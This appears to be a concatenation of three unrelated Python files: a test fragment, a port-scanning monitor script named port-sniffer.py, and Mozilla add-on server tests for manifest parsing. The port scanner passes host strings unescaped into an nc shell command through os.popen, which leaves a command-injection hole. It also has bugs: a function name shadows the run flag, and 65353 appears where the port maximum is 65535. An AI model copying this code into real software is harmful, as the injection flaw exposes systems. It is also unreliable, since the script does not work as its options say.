except KeyboardInterrupt:
if not IS_PYPY:
actual_timeout = time.time() - initial_time
# If this fails it means that although we interrupted Python actually waited for the next
# instruction to send the event and didn't really interrupt the thread.
assert actual_timeout < timeout, 'Expected the actual timeout (%s) to be < than the timeout (%s)' % (
actual_timeout, timeout)
else:
raise AssertionError('KeyboardInterrupt not generated in main thread.')
|
port-sniffer.py | import os
import re
import sys
import time
import socket
import datetime
import argparse
import termcolor
import threading
import concurrent.futures
parser = argparse.ArgumentParser(
description="Check if hosts are up.",
formatter_class=lambda prog: argparse.HelpFormatter(
prog, max_help_position=150, width=150
),
)
parser.add_argument(
"-i",
"--interval",
help="The interval in minutes between checks (default 5)",
default=5,
type=int,
)
parser.add_argument(
"-r",
"--retry",
help="The retry count when a connection fails (default 3)",
default=3,
type=int,
)
parser.add_argument(
"-d",
"--delay",
help="The retry delay in seconds when a connection fails (default 10)",
default=10,
type=int,
)
parser.add_argument(
"-t",
"--timeout",
help="The connection timeout in seconds (default 3)",
default=3,
type=int,
)
parser.add_argument(
"-s", "--start", help="The range ips that start from 0", default=0, type=int
)
parser.add_argument(
"-e", "--end", help="The range ips that end from 65353", default=65353, type=int
)
parser.add_argument(
"-H",
"--hosts",
nargs="+",
help="The host to monitor Format: '<server>:tcp <server>:udp' (default 127.0.0.1)",
default=["127.0.0.1:tcp"],
)
parser.add_argument(
"-c",
"--connection",
help="The connection type (default tcp) otherwise udp",
default="tcp",
type=str,
)
parser.add_argument(
"-z",
"--thread",
help="The needed threads (default 5)",
default=5,
type=int,
)
parser.add_argument(
"-x",
"--allport",
help="Scan all port(default 0)",
default=0,
type=int,
)
parser.add_argument(
"-n",
"--run",
help="Run in all thread(default 0)",
default=0,
type=int,
)
args = parser.parse_args()
ports = [
20,
21,
22,
23,
25,
53,
80,
110,
119,
123,
143,
161,
194,
443,
465,
587,
993,
995,
]
hosts = args.hosts
retry = args.retry
delay = args.delay
timeout = args.timeout
start = args.start
end = args.end
interval = args.interval
connection_type = args.connection
thread = args.thread
allport = args.allport == 1
run = args.run == 1
def println(string, indent, color="white"):
strindent = ""
for x in range(0, indent):
strindent = strindent + " "
print(
termcolor.colored(
"["
+ datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
+ "]"
+ strindent,
"blue",
attrs=["bold"],
),
end=" ",
)
print(termcolor.colored(string, color), end="")
print()
def tcpCheck(ip, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout)
try:
s.connect((ip, int(port)))
s.shutdown(socket.SHUT_RDWR)
return True
except:
return False
finally:
s.close()
def udpCheck(ip, port):
cmd = "nc -vzu -w " + str(timeout) + " " + ip + " " + str(port) + " 2>&1"
res = os.popen("DATA=$(" + cmd + ");echo -n $DATA").read()
if res != "":
return True
else:
return False
def checkHost(host):
ipup = False
color = "white"
for i in range(retry):
if host["conntype"] == "udp":
if udpCheck(host["ip"], host["port"]):
ipup = True
break
else:
println(
"No response from "
+ host["ip"]
+ ":"
+ str(host["port"])
+ ":"
+ host["conntype"]
+ ", retrying in "
+ str(delay)
+ "s...",
0,
color,
)
time.sleep(delay)
else:
if tcpCheck(host["ip"], host["port"]):
ipup = True
break
else:
println(
"No response from "
+ host["ip"]
+ ":"
+ str(host["port"])
+ ":"
+ host["conntype"]
+ ", retrying in "
+ str(delay)
+ "s...",
0,
color,
)
time.sleep(delay)
return ipup
def parseHost(host):
prestatus = host["status"]
color = "magenta"
println(
"Checking "
+ host["ip"]
+ ":"
+ str(host["port"])
+ ":"
+ host["conntype"]
+ "...",
0,
color,
)
if checkHost(host):
host["status"] = "up"
color = "green"
else:
host["status"] = "down"
color = "red"
println(
"Status of "
+ host["ip"]
+ ":"
+ str(host["port"])
+ ":"
+ host["conntype"]
+ ": "
+ host["status"],
0,
color,
)
time.sleep(1)
def run():
host_list = []
for ip in hosts:
if allport:
for i in range(65353):
host_list.append(
{
"ip": ip,
"port": i,
"conntype": connection_type,
"status": "unknown",
}
)
else:
for port in ports:
if port > start and port < end:
host_list.append(
{
"ip": ip,
"port": port,
"conntype": connection_type,
"status": "unknown",
}
)
while True:
if run:
threads = []
for host in host_list:
t = threading.Thread(target=parseHost, args=(host,))
threads.append(t)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
del threads[:]
else:
with concurrent.futures.ThreadPoolExecutor(max_workers=thread) as executor:
executor.map(parseHost, host_list)
println("Waiting " + str(interval) + " minutes for next check.", 0, "yellow")
try:
time.sleep(interval * 60)
except:
break
if __name__ == "__main__":
run() |
test_utils.py | # -*- coding: utf-8 -*-
import json
import os
import shutil
import tempfile
import time
import zipfile
import multiprocessing
import contextlib
from unittest import mock
from django import forms
from django.conf import settings
from django.forms import ValidationError
from django.test.utils import override_settings
import lxml
import pytest
from defusedxml.common import EntitiesForbidden, NotSupportedError
from waffle.testutils import override_switch
from olympia import amo
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.tests.test_helpers import get_addon_file
from olympia.applications.models import AppVersion
from olympia.files import utils
pytestmark = pytest.mark.django_db
def _touch(fname):
open(fname, 'a').close()
os.utime(fname, None)
class AppVersionsMixin(object):
@classmethod
def setUpTestData(cls):
cls.create_webext_default_versions()
@classmethod
def create_appversion(cls, name, version):
return AppVersion.objects.create(application=amo.APPS[name].id,
version=version)
@classmethod
def create_webext_default_versions(cls):
cls.create_appversion('firefox', '36.0') # Incompatible with webexts.
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID)
cls.create_appversion(
'android', amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
cls.create_appversion(
'android', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion(
'firefox', amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
cls.create_appversion(
'android', amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
class TestExtractor(AppVersionsMixin, TestCase):
def test_no_manifest(self):
fake_zip = utils.make_xpi({'dummy': 'dummy'})
with self.assertRaises(utils.NoManifestFound) as exc:
utils.Extractor.parse(fake_zip)
assert isinstance(exc.exception, forms.ValidationError)
assert exc.exception.message == (
'No install.rdf or manifest.json found')
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_parse_install_rdf(self, rdf_extractor, manifest_json_extractor):
fake_zip = utils.make_xpi({'install.rdf': ''})
utils.Extractor.parse(fake_zip)
assert rdf_extractor.called
assert not manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_ignore_package_json(self, rdf_extractor, manifest_json_extractor):
# Previously we preferred `package.json` to `install.rdf` which
# we don't anymore since
# https://github.com/mozilla/addons-server/issues/2460
fake_zip = utils.make_xpi({'install.rdf': '', 'package.json': ''})
utils.Extractor.parse(fake_zip)
assert rdf_extractor.called
assert not manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_parse_manifest_json(self, rdf_extractor, manifest_json_extractor):
fake_zip = utils.make_xpi({'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert not rdf_extractor.called
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_prefers_manifest_to_install_rdf(self, rdf_extractor,
manifest_json_extractor):
fake_zip = utils.make_xpi({'install.rdf': '', 'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert not rdf_extractor.called
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.os.path.getsize')
def test_static_theme_max_size(self, getsize_mock):
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{"theme": {}}').parse()
# Calling to check it doesn't raise.
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
# Increase the size though and it should raise an error.
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE + 1
with pytest.raises(forms.ValidationError) as exc:
utils.check_xpi_info(manifest, xpi_file=mock.Mock())
assert (
exc.value.message ==
u'Maximum size for WebExtension themes is 7.0ย MB.')
# dpuble check only static themes are limited
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{}').parse()
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
class TestRDFExtractor(TestCase):
def setUp(self):
self.firefox_versions = [
AppVersion.objects.create(application=amo.APPS['firefox'].id,
version='38.0a1'),
AppVersion.objects.create(application=amo.APPS['firefox'].id,
version='43.0'),
]
self.thunderbird_versions = [
AppVersion.objects.create(application=amo.APPS['android'].id,
version='42.0'),
AppVersion.objects.create(application=amo.APPS['android'].id,
version='45.0'),
]
def test_apps_disallow_thunderbird_and_seamonkey(self):
zip_file = utils.SafeZip(get_addon_file(
'valid_firefox_and_thunderbird_addon.xpi'))
extracted = utils.RDFExtractor(zip_file).parse()
apps = extracted['apps']
assert len(apps) == 1
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '38.0a1'
assert apps[0].max.version == '43.0'
class TestManifestJSONExtractor(AppVersionsMixin, TestCase):
def parse(self, base_data):
return utils.ManifestJSONExtractor(
'/fake_path', json.dumps(base_data)).parse()
def test_instanciate_without_data(self):
"""Without data, we load the data from the file path."""
data = {'id': 'some-id'}
fake_zip = utils.make_xpi({'manifest.json': json.dumps(data)})
extractor = utils.ManifestJSONExtractor(zipfile.ZipFile(fake_zip))
assert extractor.data == data
def test_guid_from_applications(self):
"""Use applications>gecko>id for the guid."""
assert self.parse(
{'applications': {
'gecko': {
'id': 'some-id'}}})['guid'] == 'some-id'
def test_guid_from_browser_specific_settings(self):
"""Use applications>gecko>id for the guid."""
assert self.parse(
{'browser_specific_settings': {
'gecko': {
'id': 'some-id'}}})['guid'] == 'some-id'
def test_name_for_guid_if_no_id(self):
"""Don't use the name for the guid if there is no id."""
assert self.parse({'name': 'addon-name'})['guid'] is None
def test_type(self):
"""manifest.json addons are always ADDON_EXTENSION."""
assert self.parse({})['type'] == amo.ADDON_EXTENSION
def test_is_restart_required(self):
"""manifest.json addons never requires restart."""
assert self.parse({})['is_restart_required'] is False
def test_name(self):
"""Use name for the name."""
assert self.parse({'name': 'addon-name'})['name'] == 'addon-name'
def test_version(self):
"""Use version for the version."""
assert self.parse({'version': '23.0.1'})['version'] == '23.0.1'
def test_homepage(self):
"""Use homepage_url for the homepage."""
assert (
self.parse({'homepage_url': 'http://my-addon.org'})['homepage'] ==
'http://my-addon.org')
def test_summary(self):
"""Use description for the summary."""
assert (
self.parse({'description': 'An addon.'})['summary'] == 'An addon.')
def test_invalid_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': 'A',
'id': '@invalid_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert (
exc.value.message ==
'Lowest supported "strict_min_version" is 42.0.')
def test_unknown_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == (
u'Unknown "strict_min_version" 76.0 for Firefox')
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_strict_min_version_needs_to_be_higher_then_42_if_specified(self):
"""strict_min_version needs to be higher than 42.0 if specified."""
data = {
'applications': {
'gecko': {
'strict_min_version': '36.0',
'id': '@too_old_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert (
exc.value.message ==
'Lowest supported "strict_min_version" is 42.0.')
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '47.0')
firefox_max_version = self.create_appversion('firefox', '47.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=47.0',
'strict_max_version': '=47.*',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min == firefox_min_version
assert app.max == firefox_max_version
# We have no way of specifying a different version for Android when an
# explicit version number is provided... That being said, we know that
# 47.0 is too low for Android, so we silently cap it at 48.0. That
# forces us to also change the max version for android.
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
# But if 'browser_specific_settings' is used, it's higher min version.
data = {'browser_specific_settings': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_is_webextension(self):
assert self.parse({})['is_webextension']
def test_allow_static_theme_waffle(self):
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{"theme": {}}').parse()
utils.check_xpi_info(manifest)
assert self.parse({'theme': {}})['type'] == amo.ADDON_STATICTHEME
def test_extensions_dont_have_strict_compatibility(self):
assert self.parse({})['strict_compatibility'] is False
def test_moz_signed_extension_no_strict_compat(self):
addon = amo.tests.addon_factory()
user = amo.tests.user_factory(email='foo@mozilla.com')
file_obj = addon.current_version.all_files[0]
file_obj.update(is_mozilla_signed_extension=True)
fixture = (
'src/olympia/files/fixtures/files/'
'legacy-addon-already-signed-0.1.0.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
parsed = utils.parse_xpi(file_obj.file_path, user=user)
assert parsed['is_mozilla_signed_extension']
assert not parsed['strict_compatibility']
def test_moz_signed_extension_reuse_strict_compat(self):
addon = amo.tests.addon_factory()
user = amo.tests.user_factory(email='foo@mozilla.com')
file_obj = addon.current_version.all_files[0]
file_obj.update(is_mozilla_signed_extension=True)
fixture = (
'src/olympia/files/fixtures/files/'
'legacy-addon-already-signed-strict-compat-0.1.0.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
parsed = utils.parse_xpi(file_obj.file_path, user=user)
assert parsed['is_mozilla_signed_extension']
# We set `strictCompatibility` in install.rdf
assert parsed['strict_compatibility']
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_disallowed(self, resolve_message):
resolve_message.return_value = 'Notify Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = (
'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
with pytest.raises(forms.ValidationError) as exc:
utils.parse_xpi(file_obj.file_path)
assert dict(exc.value.messages)['en-us'].startswith(
u'Add-on names cannot contain the Mozilla or'
)
@mock.patch('olympia.addons.models.resolve_i18n_message')
@override_switch('content-optimization', active=False)
def test_mozilla_trademark_for_prefix_allowed(self, resolve_message):
resolve_message.return_value = 'Notify for Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = (
'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
utils.parse_xpi(file_obj.file_path)
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
WebExtensions are allowed to omit `applications[/gecko]` and we
previously skipped defaulting to any `AppVersion` once this is not
defined. That resulted in none of our plattforms being selectable.
See https://github.com/mozilla/addons-server/issues/2586 and
probably many others.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_handle_utf_bom(self):
manifest = b'\xef\xbb\xbf{"manifest_version": 2, "name": "..."}'
parsed = utils.ManifestJSONExtractor(None, manifest).parse()
assert parsed['name'] == '...'
def test_raise_error_if_no_optional_id_support(self):
"""
We only support optional ids in Firefox 48+ and will throw an error
otherwise.
"""
data = {
'applications': {
'gecko': {
'strict_min_version': '42.0',
'strict_max_version': '49.0',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)['apps']
assert (
exc.value.message ==
'Add-on ID is required for Firefox 47 and below.')
def test_comments_are_allowed(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description"
}
"""
manifest = utils.ManifestJSONExtractor(
'/fake_path', json_string).parse()
assert manifest['is_webextension'] is True
assert manifest.get('name') == 'My Extension'
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# We shouldn't skip adding specific apps to the WebExtension
# no matter any potential incompatibility, e.g
# browser_specific_settings is only supported from Firefox 48.0
# onwards, now if the user specifies strict_min_compat as 42.0
# we shouldn't skip the app because of that. Instead we override the
# value with the known min version that started supporting that.
data = {
'browser_specific_settings': {
'gecko': {
'strict_min_version': '42.0',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
class TestLanguagePackAndDictionaries(AppVersionsMixin, TestCase):
def test_parse_langpack(self):
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
self.create_appversion('android', '60.0')
self.create_appversion('android', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '60.0'
assert apps[0].max.version == '60.*'
def test_parse_langpack_not_targeting_versions_explicitly(self):
data = {
'applications': {
'gecko': {
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '42.0'
# The linter should force the langpack to have a strict_max_version,
# so the value here doesn't matter much.
assert apps[0].max.version == '*'
def test_parse_dictionary(self):
self.create_appversion('firefox', '61.0')
data = {
'applications': {
'gecko': {
'id': '@dict'
}
},
'dictionaries': {'en-US': '/path/to/en-US.dic'}
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)).parse()
assert parsed_data['type'] == amo.ADDON_DICT
assert parsed_data['strict_compatibility'] is False
assert parsed_data['is_webextension'] is True
assert parsed_data['target_locale'] == 'en-US'
apps = parsed_data['apps']
assert len(apps) == 1 # Dictionaries are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '61.0'
assert apps[0].max.version == '*'
def test_parse_broken_dictionary(self):
data = {
'dictionaries': {}
}
with self.assertRaises(forms.ValidationError):
utils.ManifestJSONExtractor('/fake_path', json.dumps(data)).parse()
def test_check_xpi_info_langpack_submission_restrictions(self):
user = user_factory()
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp'
}
},
'langpack_id': 'foo'
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path.xpi', json.dumps(data)).parse()
with self.assertRaises(ValidationError):
# Regular users aren't allowed to submit langpacks.
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
# Shouldn't raise for users with proper permissions
self.grant_permission(user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
class TestManifestJSONExtractorStaticTheme(TestManifestJSONExtractor):
def parse(self, base_data):
if 'theme' not in base_data.keys():
base_data.update(theme={})
return super(
TestManifestJSONExtractorStaticTheme, self).parse(base_data)
def test_type(self):
assert self.parse({})['type'] == amo.ADDON_STATICTHEME
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
Override this because static themes have a higher default version.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '66.0')
firefox_max_version = self.create_appversion('firefox', '66.*')
android_min_version = self.create_appversion('android', '66.0')
android_max_version = self.create_appversion('android', '66.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=66.0',
'strict_max_version': '=66.*',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_theme_json_extracted(self):
# Check theme data is extracted from the manifest and returned.
data = {'theme': {'colors': {'tab_background_text': "#3deb60"}}}
assert self.parse(data)['theme'] == data['theme']
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# In the parent class this method would bump the min_version to 48.0
# because that's the first version to support
# browser_specific_settings, but in static themes we bump it even
# higher because of the minimum version when we started supporting
# static themes themselves.
data = {
'browser_specific_settings': {
'gecko': {
'strict_min_version': '42.0',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (
amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
@pytest.mark.parametrize('filename, expected_files', [
('webextension_no_id.xpi', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.zip', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.tar.gz', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('webextension_no_id.tar.bz2', [
'README.md', 'beasts', 'button', 'content_scripts', 'manifest.json',
'popup'
]),
('search.xml', [
'search.xml',
])
])
def test_extract_extension_to_dest(filename, expected_files):
extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
fname=filename)
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
temp_folder = utils.extract_extension_to_dest(extension_file)
assert sorted(os.listdir(temp_folder)) == expected_files
# fsync isn't called by default
assert not fsync_mock.called
@pytest.mark.parametrize('filename', [
'webextension_no_id.xpi', 'webextension_no_id.zip',
'webextension_no_id.tar.bz2', 'webextension_no_id.tar.gz', 'search.xml',
])
def test_extract_extension_to_dest_call_fsync(filename):
extension_file = 'src/olympia/files/fixtures/files/{fname}'.format(
fname=filename)
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
utils.extract_extension_to_dest(extension_file, force_fsync=True)
# fsync isn't called by default
assert fsync_mock.called
def test_extract_extension_to_dest_non_existing_archive():
extension_file = 'src/olympia/files/fixtures/files/doesntexist.zip'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(FileNotFoundError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
def test_extract_extension_to_dest_invalid_archive():
extension_file = (
'src/olympia/files/fixtures/files/invalid-cp437-encoding.xpi'
)
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(forms.ValidationError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
@pytest.fixture
def file_obj():
addon = amo.tests.addon_factory()
addon.update(guid='xxxxx')
version = addon.current_version
return version.all_files[0]
@pytestmark
def test_bump_version_in_manifest_json(file_obj):
AppVersion.objects.create(application=amo.FIREFOX.id,
version=amo.DEFAULT_WEBEXT_MIN_VERSION)
AppVersion.objects.create(application=amo.FIREFOX.id,
version=amo.DEFAULT_WEBEXT_MAX_VERSION)
AppVersion.objects.create(application=amo.ANDROID.id,
version=amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
AppVersion.objects.create(application=amo.ANDROID.id,
version=amo.DEFAULT_WEBEXT_MAX_VERSION)
with amo.tests.copy_file(
'src/olympia/files/fixtures/files/webextension.xpi',
file_obj.file_path):
utils.update_version_number(file_obj, '0.0.1.1-signed')
parsed = utils.parse_xpi(file_obj.file_path)
assert parsed['version'] == '0.0.1.1-signed'
def test_extract_translations_simple(file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
messages = utils.extract_translations(file_obj)
assert list(sorted(messages.keys())) == [
'de', 'en-US', 'ja', 'nb-NO', 'nl', 'ru', 'sv-SE']
@mock.patch('olympia.files.utils.zipfile.ZipFile.read')
def test_extract_translations_fail_silent_invalid_file(read_mock, file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
read_mock.side_effect = KeyError
# Does not raise an exception
utils.extract_translations(file_obj)
read_mock.side_effect = IOError
# Does not raise an exception too
utils.extract_translations(file_obj)
# We don't fail on invalid JSON too, this is addons-linter domain
read_mock.side_effect = ValueError
utils.extract_translations(file_obj)
# But everything else...
read_mock.side_effect = TypeError
with pytest.raises(TypeError):
utils.extract_translations(file_obj)
def test_get_all_files():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
assert utils.get_all_files(tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
shutil.rmtree(tempdir)
assert not os.path.exists(tempdir)
